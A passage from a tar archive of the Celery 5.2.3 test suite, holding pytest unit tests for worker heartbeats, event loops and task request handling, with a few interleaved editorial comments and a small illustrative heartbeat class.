patch.dict(sys.modules, {'foo': None}): panel.handle('pool_restart', { 'modules': ['foo'], 'reload': False, 'reloader': _reload, }) consumer.controller.pool.restart.assert_called() _reload.assert_not_called() _import.assert_not_called() _import.reset_mock() _reload.reset_mock() consumer.controller.pool.restart.reset_mock() panel.handle('pool_restart', { 'modules': ['foo'], 'reload': True, 'reloader': _reload, }) consumer.controller.pool.restart.assert_called() _reload.assert_called() _import.assert_not_called() def test_query_task(self): consumer = Consumer(self.app) consumer.controller = _WC(app=self.app) consumer.controller.consumer = consumer panel = self.create_panel(consumer=consumer) panel.app = self.app req1 = Request( self.TaskMessage(self.mytask.name, args=(2, 2)), app=self.app, ) worker_state.task_reserved(req1) try: assert not panel.handle('query_task', {'ids': {'1daa'}}) ret = panel.handle('query_task', {'ids': {req1.id}}) assert req1.id in ret assert ret[req1.id][0] == 'reserved' worker_state.active_requests.add(req1) try: ret = panel.handle('query_task', {'ids': {req1.id}}) assert ret[req1.id][0] == 'active' finally: worker_state.active_requests.clear() ret = panel.handle('query_task', {'ids': {req1.id}}) assert ret[req1.id][0] == 'reserved' finally: worker_state.reserved_requests.clear() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/worker/test_heartbeat.py0000664000175000017500000000452000000000000021001 0ustar00asifasif00000000000000from unittest.mock import Mock from celery.worker.heartbeat import Heart class MockDispatcher: heart = None next_iter = 0 def __init__(self): self.sent = [] self.on_enabled = set() self.on_disabled = set() self.enabled = True def send(self, msg, **_fields): self.sent.append((msg, _fields)) if self.heart: if self.next_iter > 10: self.heart._shutdown.set() self.next_iter += 1 class MockTimer: def call_repeatedly(self, secs, fun, args=(), kwargs={}): class entry(tuple): canceled = False def cancel(self): self.canceled = True return entry((secs, fun, args, kwargs)) def cancel(self, entry): entry.cancel() class test_Heart: def test_start_stop(self): timer = MockTimer() eventer = MockDispatcher() h = Heart(timer, eventer, interval=1) h.start() assert h.tref h.stop() assert h.tref is None h.stop() def test_send_sends_signal(self): h = Heart(MockTimer(), MockDispatcher(), interval=1) h._send_sent_signal = None h._send('worker-heartbeat') h._send_sent_signal = Mock(name='send_sent_signal') h._send('worker') h._send_sent_signal.assert_called_with(sender=h) def test_start_when_disabled(self): timer = MockTimer() eventer = MockDispatcher() eventer.enabled = False h = Heart(timer, eventer) h.start() assert not h.tref assert not eventer.sent def test_stop_when_disabled(self): timer = MockTimer() eventer = MockDispatcher() eventer.enabled = False h = Heart(timer, eventer) h.stop() assert not eventer.sent def test_message_retries(self): timer = MockTimer() eventer = MockDispatcher() eventer.enabled = True h = Heart(timer, eventer, interval=1) h.start() assert eventer.sent[-1][0] == "worker-online" # Invoke a heartbeat h.tref[1](*h.tref[2], **h.tref[3]) assert eventer.sent[-1][0] == "worker-heartbeat" assert eventer.sent[-1][1]["retry"] h.stop() assert eventer.sent[-1][0] == "worker-offline" assert not eventer.sent[-1][1]["retry"] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 
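# ---------------------------------------------------------------------------
# Illustrative sketch (editorial, not shipped with Celery): the heartbeat
# tests above assert a small contract -- send 'worker-online' on start,
# schedule a repeating 'worker-heartbeat' with retry enabled, and send a
# final 'worker-offline' without retry on stop.  A minimal component that
# honours that contract against the MockTimer/MockDispatcher API used above
# might look like this (SimpleHeart is a hypothetical name, not Celery's
# Heart implementation):

class SimpleHeart:
    def __init__(self, timer, eventer, interval=2.0):
        self.timer = timer
        self.eventer = eventer
        self.interval = interval
        self.tref = None

    def _beat(self):
        # Periodic heartbeat events are safe to retry.
        self.eventer.send('worker-heartbeat', retry=True)

    def start(self):
        if self.eventer.enabled and self.tref is None:
            self.eventer.send('worker-online')
            self.tref = self.timer.call_repeatedly(self.interval, self._beat)

    def stop(self):
        if self.tref is not None:
            self.timer.cancel(self.tref)
            self.tref = None
            self.eventer.send('worker-offline', retry=False)
# ---------------------------------------------------------------------------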
celery-5.2.3/t/unit/worker/test_loops.py0000664000175000017500000004354300000000000020206 0ustar00asifasif00000000000000
import errno
import socket
from queue import Empty
from unittest.mock import Mock

import pytest
from kombu.asynchronous import ERR, READ, WRITE, Hub
from kombu.exceptions import DecodeError

from celery.bootsteps import CLOSE, RUN
from celery.exceptions import (InvalidTaskError, WorkerLostError,
                               WorkerShutdown, WorkerTerminate)
from celery.platforms import EX_FAILURE, EX_OK
from celery.worker import state
from celery.worker.consumer import Consumer
from celery.worker.loops import _quick_drain, asynloop, synloop


class PromiseEqual:

    def __init__(self, fun, *args, **kwargs):
        self.fun = fun
        self.args = args
        self.kwargs = kwargs

    def __eq__(self, other):
        return (other.fun == self.fun and
                other.args == self.args and
                other.kwargs == self.kwargs)

    def __repr__(self):
        return ''.format(self)


class X:

    def __init__(self, app, heartbeat=None, on_task_message=None,
                 transport_driver_type=None):
        hub = Hub()
        (
            self.obj,
            self.connection,
            self.consumer,
            self.blueprint,
            self.hub,
            self.qos,
            self.heartbeat,
            self.clock,
        ) = self.args = [Mock(name='obj'),
                         Mock(name='connection'),
                         Mock(name='consumer'),
                         Mock(name='blueprint'),
                         hub,
                         Mock(name='qos'),
                         heartbeat,
                         Mock(name='clock')]
        self.connection.supports_heartbeats = True
        self.connection.get_heartbeat_interval.side_effect = (
            lambda: self.heartbeat
        )
        self.consumer.callbacks = []
        self.obj.strategies = {}
        self.connection.connection_errors = (socket.error,)
        if transport_driver_type:
            self.connection.transport.driver_type = transport_driver_type
        self.hub.readers = {}
        self.hub.timer = Mock(name='hub.timer')
        self.hub.timer._queue = [Mock()]
        self.hub.fire_timers = Mock(name='hub.fire_timers')
        self.hub.fire_timers.return_value = 1.7
        self.hub.poller = Mock(name='hub.poller')
        self.hub.close = Mock(name='hub.close()')  # asynloop calls hub.close
        self.Hub = self.hub
        self.blueprint.state = RUN
        # need this for create_task_handler
        self._consumer = _consumer = Consumer(
            Mock(), timer=Mock(), controller=Mock(), app=app)
        _consumer.on_task_message = on_task_message or []
        self.obj.create_task_handler = _consumer.create_task_handler
        self.on_unknown_message = self.obj.on_unknown_message = Mock(
            name='on_unknown_message',
        )
        _consumer.on_unknown_message = self.on_unknown_message
        self.on_unknown_task = self.obj.on_unknown_task = Mock(
            name='on_unknown_task',
        )
        _consumer.on_unknown_task = self.on_unknown_task
        self.on_invalid_task = self.obj.on_invalid_task = Mock(
            name='on_invalid_task',
        )
        _consumer.on_invalid_task = self.on_invalid_task
        self.on_decode_error = self.obj.on_decode_error = Mock(
            name='on_decode_error',
        )
        _consumer.on_decode_error = self.on_decode_error
        _consumer.strategies = self.obj.strategies

    def timeout_then_error(self, mock):

        def first(*args, **kwargs):
            mock.side_effect = socket.error()
            raise socket.timeout()
        mock.side_effect = first

    def close_then_error(self, mock=None, mod=0, exc=None):
        mock = Mock() if mock is None else mock

        def first(*args, **kwargs):
            if not mod or mock.call_count > mod:
                self.close()
                raise (socket.error() if exc is None else exc)
        mock.side_effect = first
        return mock

    def close(self, *args, **kwargs):
        self.blueprint.state = CLOSE

    def closer(self, mock=None, mod=0):
        mock = Mock() if mock is None else mock

        def closing(*args, **kwargs):
            if not mod or mock.call_count >= mod:
                self.close()
        mock.side_effect = closing
        return mock


def get_task_callback(*args, **kwargs):
    x = X(*args, **kwargs)
    x.blueprint.state = CLOSE
    asynloop(*x.args)
    return x,
x.consumer.on_message class test_asynloop: def setup(self): @self.app.task(shared=False) def add(x, y): return x + y self.add = add def test_drain_after_consume(self): x, _ = get_task_callback(self.app, transport_driver_type='amqp') assert _quick_drain in [p.fun for p in x.hub._ready] def test_pool_did_not_start_at_startup(self): x = X(self.app) x.obj.restart_count = 0 x.obj.pool.did_start_ok.return_value = False with pytest.raises(WorkerLostError): asynloop(*x.args) def test_setup_heartbeat(self): x = X(self.app, heartbeat=10) x.hub.timer.call_repeatedly = Mock(name='x.hub.call_repeatedly()') x.blueprint.state = CLOSE asynloop(*x.args) x.consumer.consume.assert_called_with() x.obj.on_ready.assert_called_with() last_call_args, _ = x.hub.timer.call_repeatedly.call_args assert last_call_args[0] == 10 / 2.0 assert last_call_args[2] == (2.0,) def task_context(self, sig, **kwargs): x, on_task = get_task_callback(self.app, **kwargs) message = self.task_message_from_sig(self.app, sig) strategy = x.obj.strategies[sig.task] = Mock(name='strategy') return x, on_task, message, strategy def test_on_task_received(self): x, on_task, msg, strategy = self.task_context(self.add.s(2, 2)) on_task(msg) strategy.assert_called_with( msg, None, PromiseEqual(x._consumer.call_soon, msg.ack_log_error), PromiseEqual(x._consumer.call_soon, msg.reject_log_error), [], ) def test_on_task_received_executes_on_task_message(self): cbs = [Mock(), Mock(), Mock()] x, on_task, msg, strategy = self.task_context( self.add.s(2, 2), on_task_message=cbs, ) on_task(msg) strategy.assert_called_with( msg, None, PromiseEqual(x._consumer.call_soon, msg.ack_log_error), PromiseEqual(x._consumer.call_soon, msg.reject_log_error), cbs, ) def test_on_task_message_missing_name(self): x, on_task, msg, strategy = self.task_context(self.add.s(2, 2)) msg.headers.pop('task') on_task(msg) x.on_unknown_message.assert_called_with(msg.decode(), msg) def test_on_task_pool_raises(self): x, on_task, msg, strategy = self.task_context(self.add.s(2, 2)) strategy.side_effect = ValueError() with pytest.raises(ValueError): on_task(msg) def test_on_task_InvalidTaskError(self): x, on_task, msg, strategy = self.task_context(self.add.s(2, 2)) exc = strategy.side_effect = InvalidTaskError() on_task(msg) x.on_invalid_task.assert_called_with(None, msg, exc) def test_on_task_DecodeError(self): x, on_task, msg, strategy = self.task_context(self.add.s(2, 2)) exc = strategy.side_effect = DecodeError() on_task(msg) x.on_decode_error.assert_called_with(msg, exc) @pytest.mark.parametrize('should_stop', (None, False, True, EX_OK)) def test_should_terminate(self, should_stop): x = X(self.app) state.should_stop = should_stop state.should_terminate = True try: with pytest.raises(WorkerTerminate): asynloop(*x.args) finally: state.should_stop = None state.should_terminate = None def test_should_terminate_hub_close_raises(self): x = X(self.app) # XXX why aren't the errors propagated?!? 
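# Illustrative note (editorial): the surrounding tests rely on the
# module-level flags in celery.worker.state -- should_terminate makes the
# loop raise WorkerTerminate (cold shutdown) and should_stop makes it raise
# WorkerShutdown (warm shutdown); both may carry an exit code such as EX_OK
# or EX_FAILURE, which is why the tests reset them to None in their finally
# blocks.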
state.should_terminate = EX_FAILURE x.hub.close.side_effect = MemoryError() try: with pytest.raises(WorkerTerminate): asynloop(*x.args) finally: state.should_terminate = None def test_should_stop(self): x = X(self.app) state.should_stop = 303 try: with pytest.raises(WorkerShutdown): asynloop(*x.args) finally: state.should_stop = None def test_updates_qos(self): x = X(self.app) x.qos.prev = 3 x.qos.value = 3 x.hub.on_tick.add(x.closer(mod=2)) x.hub.timer._queue = [1] asynloop(*x.args) x.qos.update.assert_not_called() x = X(self.app) x.qos.prev = 1 x.qos.value = 6 x.hub.on_tick.add(x.closer(mod=2)) asynloop(*x.args) x.qos.update.assert_called_with() x.hub.fire_timers.assert_called_with(propagate=(socket.error,)) def test_poll_empty(self): x = X(self.app) x.hub.readers = {6: Mock()} x.hub.timer._queue = [1] x.close_then_error(x.hub.poller.poll) x.hub.fire_timers.return_value = 33.37 poller = x.hub.poller poller.poll.return_value = [] with pytest.raises(socket.error): asynloop(*x.args) poller.poll.assert_called_with(33.37) def test_poll_readable(self): x = X(self.app) reader = Mock(name='reader') x.hub.add_reader(6, reader, 6) x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), mod=4)) poller = x.hub.poller poller.poll.return_value = [(6, READ)] with pytest.raises(socket.error): asynloop(*x.args) reader.assert_called_with(6) poller.poll.assert_called() def test_poll_readable_raises_Empty(self): x = X(self.app) reader = Mock(name='reader') x.hub.add_reader(6, reader, 6) x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), 2)) poller = x.hub.poller poller.poll.return_value = [(6, READ)] reader.side_effect = Empty() with pytest.raises(socket.error): asynloop(*x.args) reader.assert_called_with(6) poller.poll.assert_called() def test_poll_writable(self): x = X(self.app) writer = Mock(name='writer') x.hub.add_writer(6, writer, 6) x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), 2)) poller = x.hub.poller poller.poll.return_value = [(6, WRITE)] with pytest.raises(socket.error): asynloop(*x.args) writer.assert_called_with(6) poller.poll.assert_called() def test_poll_writable_none_registered(self): x = X(self.app) writer = Mock(name='writer') x.hub.add_writer(6, writer, 6) x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), 2)) poller = x.hub.poller poller.poll.return_value = [(7, WRITE)] with pytest.raises(socket.error): asynloop(*x.args) poller.poll.assert_called() def test_poll_unknown_event(self): x = X(self.app) writer = Mock(name='reader') x.hub.add_writer(6, writer, 6) x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), 2)) poller = x.hub.poller poller.poll.return_value = [(6, 0)] with pytest.raises(socket.error): asynloop(*x.args) poller.poll.assert_called() def test_poll_keep_draining_disabled(self): x = X(self.app) x.hub.writers = {6: Mock()} poll = x.hub.poller.poll def se(*args, **kwargs): poll.side_effect = socket.error() poll.side_effect = se poller = x.hub.poller poll.return_value = [(6, 0)] with pytest.raises(socket.error): asynloop(*x.args) poller.poll.assert_called() def test_poll_err_writable(self): x = X(self.app) writer = Mock(name='writer') x.hub.add_writer(6, writer, 6, 48) x.hub.on_tick.add(x.close_then_error(Mock(), 2)) poller = x.hub.poller poller.poll.return_value = [(6, ERR)] with pytest.raises(socket.error): asynloop(*x.args) writer.assert_called_with(6, 48) poller.poll.assert_called() def test_poll_write_generator(self): x = X(self.app) x.hub.remove = Mock(name='hub.remove()') def Gen(): yield 1 yield 2 gen = Gen() x.hub.add_writer(6, gen) 
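# Illustrative note (editorial): this test and the two that follow exercise
# how the hub treats generator-based writers -- the generator is stepped
# each time the descriptor becomes writable, appears to stay registered
# while it still has frames to run, and is removed from the hub once it is
# exhausted or raises, which is what the gi_frame and hub.remove assertions
# check.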
x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), 2)) x.hub.poller.poll.return_value = [(6, WRITE)] with pytest.raises(socket.error): asynloop(*x.args) assert gen.gi_frame.f_lasti != -1 x.hub.remove.assert_not_called() def test_poll_write_generator_stopped(self): x = X(self.app) def Gen(): if 0: yield gen = Gen() x.hub.add_writer(6, gen) x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), 2)) x.hub.poller.poll.return_value = [(6, WRITE)] x.hub.remove = Mock(name='hub.remove()') with pytest.raises(socket.error): asynloop(*x.args) assert gen.gi_frame is None def test_poll_write_generator_raises(self): x = X(self.app) def Gen(): raise ValueError('foo') yield gen = Gen() x.hub.add_writer(6, gen) x.hub.remove = Mock(name='hub.remove()') x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), 2)) x.hub.poller.poll.return_value = [(6, WRITE)] with pytest.raises(ValueError): asynloop(*x.args) assert gen.gi_frame is None x.hub.remove.assert_called_with(6) def test_poll_err_readable(self): x = X(self.app) reader = Mock(name='reader') x.hub.add_reader(6, reader, 6, 24) x.hub.on_tick.add(x.close_then_error(Mock(), 2)) poller = x.hub.poller poller.poll.return_value = [(6, ERR)] with pytest.raises(socket.error): asynloop(*x.args) reader.assert_called_with(6, 24) poller.poll.assert_called() def test_poll_raises_ValueError(self): x = X(self.app) x.hub.readers = {6: Mock()} poller = x.hub.poller x.close_then_error(poller.poll, exc=ValueError) asynloop(*x.args) poller.poll.assert_called() def test_heartbeat_error(self): x = X(self.app, heartbeat=10) x.connection.heartbeat_check = Mock( side_effect=RuntimeError("Heartbeat error") ) def call_repeatedly(rate, fn, args): fn(*args) x.hub.timer.call_repeatedly = call_repeatedly with pytest.raises(RuntimeError): asynloop(*x.args) def test_no_heartbeat_support(self): x = X(self.app) x.connection.supports_heartbeats = False x.hub.timer.call_repeatedly = Mock( name='x.hub.timer.call_repeatedly()' ) x.hub.on_tick.add(x.closer(mod=2)) asynloop(*x.args) x.hub.timer.call_repeatedly.assert_not_called() class test_synloop: def test_timeout_ignored(self): x = X(self.app) x.timeout_then_error(x.connection.drain_events) with pytest.raises(socket.error): synloop(*x.args) assert x.connection.drain_events.call_count == 2 def test_updates_qos_when_changed(self): x = X(self.app) x.qos.prev = 2 x.qos.value = 2 x.timeout_then_error(x.connection.drain_events) with pytest.raises(socket.error): synloop(*x.args) x.qos.update.assert_not_called() x.qos.value = 4 x.timeout_then_error(x.connection.drain_events) with pytest.raises(socket.error): synloop(*x.args) x.qos.update.assert_called_with() def test_ignores_socket_errors_when_closed(self): x = X(self.app) x.close_then_error(x.connection.drain_events) assert synloop(*x.args) is None def test_no_connection(self): x = X(self.app) x.connection = None x.hub.timer.call_repeatedly = Mock( name='x.hub.timer.call_repeatedly()' ) x.blueprint.state = CLOSE synloop(*x.args) x.hub.timer.call_repeatedly.assert_not_called() def test_heartbeat_error(self): x = X(self.app, heartbeat=10) x.obj.pool.is_green = True def heartbeat_check(rate): raise RuntimeError('Heartbeat error') def call_repeatedly(rate, fn, args): fn(*args) x.connection.heartbeat_check = Mock( name='heartbeat_check', side_effect=heartbeat_check ) x.obj.timer.call_repeatedly = call_repeatedly with pytest.raises(RuntimeError): synloop(*x.args) def test_no_heartbeat_support(self): x = X(self.app) x.connection.supports_heartbeats = False x.obj.pool.is_green = True 
x.obj.timer.call_repeatedly = Mock( name='x.obj.timer.call_repeatedly()' ) def drain_events(timeout): x.blueprint.state = CLOSE x.connection.drain_events.side_effect = drain_events synloop(*x.args) x.obj.timer.call_repeatedly.assert_not_called() class test_quick_drain: def setup(self): self.connection = Mock(name='connection') def test_drain(self): _quick_drain(self.connection, timeout=33.3) self.connection.drain_events.assert_called_with(timeout=33.3) def test_drain_error(self): exc = KeyError() exc.errno = 313 self.connection.drain_events.side_effect = exc with pytest.raises(KeyError): _quick_drain(self.connection, timeout=33.3) def test_drain_error_EAGAIN(self): exc = KeyError() exc.errno = errno.EAGAIN self.connection.drain_events.side_effect = exc _quick_drain(self.connection, timeout=33.3) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/worker/test_request.py0000664000175000017500000013377400000000000020550 0ustar00asifasif00000000000000import numbers import os import signal import socket from datetime import datetime, timedelta from time import monotonic, time from unittest.mock import Mock, patch import pytest from billiard.einfo import ExceptionInfo from kombu.utils.encoding import from_utf8, safe_repr, safe_str from kombu.utils.uuid import uuid from celery import states from celery.app.trace import (TraceInfo, build_tracer, fast_trace_task, mro_lookup, reset_worker_optimizations, setup_worker_optimizations, trace_task, trace_task_ret) from celery.backends.base import BaseDictBackend from celery.exceptions import (Ignore, InvalidTaskError, Reject, Retry, TaskRevokedError, Terminated, WorkerLostError) from celery.signals import task_failure, task_retry, task_revoked from celery.worker import request as module from celery.worker import strategy from celery.worker.request import Request, create_request_cls from celery.worker.request import logger as req_logger from celery.worker.state import revoked class RequestCase: def setup(self): self.app.conf.result_serializer = 'pickle' @self.app.task(shared=False) def add(x, y, **kw_): return x + y self.add = add @self.app.task(shared=False) def mytask(i, **kwargs): return i ** i self.mytask = mytask @self.app.task(shared=False) def mytask_raising(i): raise KeyError(i) self.mytask_raising = mytask_raising def xRequest(self, name=None, id=None, args=None, kwargs=None, on_ack=None, on_reject=None, Request=Request, **head): args = [1] if args is None else args kwargs = {'f': 'x'} if kwargs is None else kwargs on_ack = on_ack or Mock(name='on_ack') on_reject = on_reject or Mock(name='on_reject') message = self.TaskMessage( name or self.mytask.name, id, args=args, kwargs=kwargs, **head ) return Request(message, app=self.app, on_ack=on_ack, on_reject=on_reject) class test_mro_lookup: def test_order(self): class A: pass class B(A): pass class C(B): pass class D(C): @classmethod def mro(cls): return () A.x = 10 assert mro_lookup(C, 'x') == A assert mro_lookup(C, 'x', stop={A}) is None B.x = 10 assert mro_lookup(C, 'x') == B C.x = 10 assert mro_lookup(C, 'x') == C assert mro_lookup(D, 'x') is None def jail(app, task_id, name, request_opts, args, kwargs): request = {'id': task_id} request.update(request_opts) task = app.tasks[name] task.__trace__ = None # rebuild return trace_task( task, task_id, args, kwargs, request=request, eager=False, app=app, ).retval class test_Retry: def test_retry_semipredicate(self): try: raise Exception('foo') except Exception as exc: ret = 
Retry('Retrying task', exc) assert ret.exc == exc class test_trace_task(RequestCase): def test_process_cleanup_fails(self, patching): _logger = patching('celery.app.trace.logger') self.mytask.backend = Mock() self.mytask.backend.process_cleanup = Mock(side_effect=KeyError()) tid = uuid() ret = jail(self.app, tid, self.mytask.name, {}, [2], {}) assert ret == 4 self.mytask.backend.mark_as_done.assert_called() assert 'Process cleanup failed' in _logger.error.call_args[0][0] def test_process_cleanup_BaseException(self): self.mytask.backend = Mock() self.mytask.backend.process_cleanup = Mock(side_effect=SystemExit()) with pytest.raises(SystemExit): jail(self.app, uuid(), self.mytask.name, {}, [2], {}) def test_execute_jail_success(self): ret = jail(self.app, uuid(), self.mytask.name, {}, [2], {}) assert ret == 4 def test_marked_as_started(self): _started = [] def store_result(tid, meta, state, **kwargs): if state == states.STARTED: _started.append(tid) self.mytask.backend.store_result = Mock(name='store_result') self.mytask.backend.store_result.side_effect = store_result self.mytask.track_started = True tid = uuid() jail(self.app, tid, self.mytask.name, {}, [2], {}) assert tid in _started self.mytask.ignore_result = True tid = uuid() jail(self.app, tid, self.mytask.name, {}, [2], {}) assert tid not in _started def test_execute_jail_failure(self): ret = jail( self.app, uuid(), self.mytask_raising.name, {}, [4], {}, ) assert isinstance(ret, ExceptionInfo) assert ret.exception.args == (4,) def test_execute_task_ignore_result(self): @self.app.task(shared=False, ignore_result=True) def ignores_result(i): return i ** i task_id = uuid() ret = jail(self.app, task_id, ignores_result.name, {}, [4], {}) assert ret == 256 assert not self.app.AsyncResult(task_id).ready() def test_execute_request_ignore_result(self): @self.app.task(shared=False) def ignores_result(i): return i ** i task_id = uuid() ret = jail( self.app, task_id, ignores_result.name, {'ignore_result': True}, [4], {} ) assert ret == 256 assert not self.app.AsyncResult(task_id).ready() class test_Request(RequestCase): def get_request(self, sig, Request=Request, exclude_headers=None, **kwargs): msg = self.task_message_from_sig(self.app, sig) headers = None if exclude_headers: headers = msg.headers for header in exclude_headers: headers.pop(header) return Request( msg, on_ack=Mock(name='on_ack'), on_reject=Mock(name='on_reject'), eventer=Mock(name='eventer'), app=self.app, connection_errors=(socket.error,), task=sig.type, headers=headers, **kwargs ) def test_shadow(self): assert self.get_request( self.add.s(2, 2).set(shadow='fooxyz')).name == 'fooxyz' def test_args(self): args = (2, 2) assert self.get_request( self.add.s(*args)).args == args def test_kwargs(self): kwargs = {'1': '2', '3': '4'} assert self.get_request( self.add.s(**kwargs)).kwargs == kwargs def test_info_function(self): import random import string kwargs = {} for i in range(0, 2): kwargs[str(i)] = ''.join( random.choice(string.ascii_lowercase) for i in range(1000)) assert self.get_request( self.add.s(**kwargs)).info(safe=True).get( 'kwargs') == '' # mock message doesn't populate kwargsrepr assert self.get_request( self.add.s(**kwargs)).info(safe=False).get('kwargs') == kwargs args = [] for i in range(0, 2): args.append(''.join( random.choice(string.ascii_lowercase) for i in range(1000))) assert list(self.get_request( self.add.s(*args)).info(safe=True).get( 'args')) == [] # mock message doesn't populate argsrepr assert list(self.get_request( 
self.add.s(*args)).info(safe=False).get('args')) == args def test_no_shadow_header(self): request = self.get_request(self.add.s(2, 2), exclude_headers=['shadow']) assert request.name == 't.unit.worker.test_request.add' def test_invalid_eta_raises_InvalidTaskError(self): with pytest.raises(InvalidTaskError): self.get_request(self.add.s(2, 2).set(eta='12345')) def test_invalid_expires_raises_InvalidTaskError(self): with pytest.raises(InvalidTaskError): self.get_request(self.add.s(2, 2).set(expires='12345')) def test_valid_expires_with_utc_makes_aware(self): with patch('celery.worker.request.maybe_make_aware') as mma: self.get_request(self.add.s(2, 2).set(expires=10), maybe_make_aware=mma) mma.assert_called() def test_maybe_expire_when_expires_is_None(self): req = self.get_request(self.add.s(2, 2)) assert not req.maybe_expire() def test_on_retry_acks_if_late(self): self.add.acks_late = True req = self.get_request(self.add.s(2, 2)) req.on_retry(Mock()) req.on_ack.assert_called_with(req_logger, req.connection_errors) def test_on_failure_Terminated(self): einfo = None try: raise Terminated('9') except Terminated: einfo = ExceptionInfo() assert einfo is not None req = self.get_request(self.add.s(2, 2)) req.on_failure(einfo) req.eventer.send.assert_called_with( 'task-revoked', uuid=req.id, terminated=True, signum='9', expired=False, ) def test_on_failure_propagates_MemoryError(self): einfo = None try: raise MemoryError() except MemoryError: einfo = ExceptionInfo(internal=True) assert einfo is not None req = self.get_request(self.add.s(2, 2)) with pytest.raises(MemoryError): req.on_failure(einfo) def test_on_failure_Ignore_acknowledges(self): einfo = None try: raise Ignore() except Ignore: einfo = ExceptionInfo(internal=True) assert einfo is not None req = self.get_request(self.add.s(2, 2)) req.on_failure(einfo) req.on_ack.assert_called_with(req_logger, req.connection_errors) def test_on_failure_Reject_rejects(self): einfo = None try: raise Reject() except Reject: einfo = ExceptionInfo(internal=True) assert einfo is not None req = self.get_request(self.add.s(2, 2)) req.on_failure(einfo) req.on_reject.assert_called_with( req_logger, req.connection_errors, False, ) def test_on_failure_Reject_rejects_with_requeue(self): einfo = None try: raise Reject(requeue=True) except Reject: einfo = ExceptionInfo(internal=True) assert einfo is not None req = self.get_request(self.add.s(2, 2)) req.on_failure(einfo) req.on_reject.assert_called_with( req_logger, req.connection_errors, True, ) def test_on_failure_WorkerLostError_rejects_with_requeue(self): try: raise WorkerLostError() except WorkerLostError: einfo = ExceptionInfo(internal=True) req = self.get_request(self.add.s(2, 2)) req.task.acks_late = True req.task.reject_on_worker_lost = True req.delivery_info['redelivered'] = False req.task.backend = Mock() req.on_failure(einfo) req.on_reject.assert_called_with( req_logger, req.connection_errors, True) req.task.backend.mark_as_failure.assert_not_called() def test_on_failure_WorkerLostError_redelivered_None(self): try: raise WorkerLostError() except WorkerLostError: einfo = ExceptionInfo(internal=True) req = self.get_request(self.add.s(2, 2)) req.task.acks_late = True req.task.reject_on_worker_lost = True req.delivery_info['redelivered'] = None req.task.backend = Mock() req.on_failure(einfo) req.on_reject.assert_called_with( req_logger, req.connection_errors, True) req.task.backend.mark_as_failure.assert_not_called() def test_on_failure_WorkerLostError_redelivered_True(self): try: raise WorkerLostError() except 
WorkerLostError: einfo = ExceptionInfo(internal=True) req = self.get_request(self.add.s(2, 2)) req.task.acks_late = False req.task.reject_on_worker_lost = True req.delivery_info['redelivered'] = True req.task.backend = Mock() with self.assert_signal_called( task_failure, sender=req.task, task_id=req.id, exception=einfo.exception, args=req.args, kwargs=req.kwargs, traceback=einfo.traceback, einfo=einfo ): req.on_failure(einfo) req.task.backend.mark_as_failure.assert_called_once_with(req.id, einfo.exception, request=req._context, store_result=True) def test_tzlocal_is_cached(self): req = self.get_request(self.add.s(2, 2)) req._tzlocal = 'foo' assert req.tzlocal == 'foo' def test_task_wrapper_repr(self): assert repr(self.xRequest()) def test_sets_store_errors(self): self.mytask.ignore_result = True job = self.xRequest() assert not job.store_errors self.mytask.store_errors_even_if_ignored = True job = self.xRequest() assert job.store_errors def test_send_event(self): job = self.xRequest() job.eventer = Mock(name='.eventer') job.send_event('task-frobulated') job.eventer.send.assert_called_with('task-frobulated', uuid=job.id) def test_send_events__disabled_at_task_level(self): job = self.xRequest() job.task.send_events = False job.eventer = Mock(name='.eventer') job.send_event('task-frobulated') job.eventer.send.assert_not_called() def test_on_retry(self): job = self.get_request(self.mytask.s(1, f='x')) job.eventer = Mock(name='.eventer') try: raise Retry('foo', KeyError('moofoobar')) except Retry: einfo = ExceptionInfo() job.on_failure(einfo) job.eventer.send.assert_called_with( 'task-retried', uuid=job.id, exception=safe_repr(einfo.exception.exc), traceback=safe_str(einfo.traceback), ) prev, module._does_info = module._does_info, False try: job.on_failure(einfo) finally: module._does_info = prev einfo.internal = True job.on_failure(einfo) def test_compat_properties(self): job = self.xRequest() assert job.task_id == job.id assert job.task_name == job.name job.task_id = 'ID' assert job.id == 'ID' job.task_name = 'NAME' assert job.name == 'NAME' def test_terminate__pool_ref(self): pool = Mock() signum = signal.SIGTERM job = self.get_request(self.mytask.s(1, f='x')) job._apply_result = Mock(name='_apply_result') with self.assert_signal_called( task_revoked, sender=job.task, request=job._context, terminated=True, expired=False, signum=signum): job.time_start = monotonic() job.worker_pid = 314 job.terminate(pool, signal='TERM') job._apply_result().terminate.assert_called_with(signum) job._apply_result = Mock(name='_apply_result2') job._apply_result.return_value = None job.terminate(pool, signal='TERM') def test_terminate__task_started(self): pool = Mock() signum = signal.SIGTERM job = self.get_request(self.mytask.s(1, f='x')) with self.assert_signal_called( task_revoked, sender=job.task, request=job._context, terminated=True, expired=False, signum=signum): job.time_start = monotonic() job.worker_pid = 313 job.terminate(pool, signal='TERM') pool.terminate_job.assert_called_with(job.worker_pid, signum) def test_cancel__pool_ref(self): pool = Mock() signum = signal.SIGTERM job = self.get_request(self.mytask.s(1, f='x')) job._apply_result = Mock(name='_apply_result') with self.assert_signal_called( task_retry, sender=job.task, request=job._context, einfo=None): job.time_start = monotonic() job.worker_pid = 314 job.cancel(pool, signal='TERM') job._apply_result().terminate.assert_called_with(signum) job._apply_result = Mock(name='_apply_result2') job._apply_result.return_value = None job.cancel(pool, 
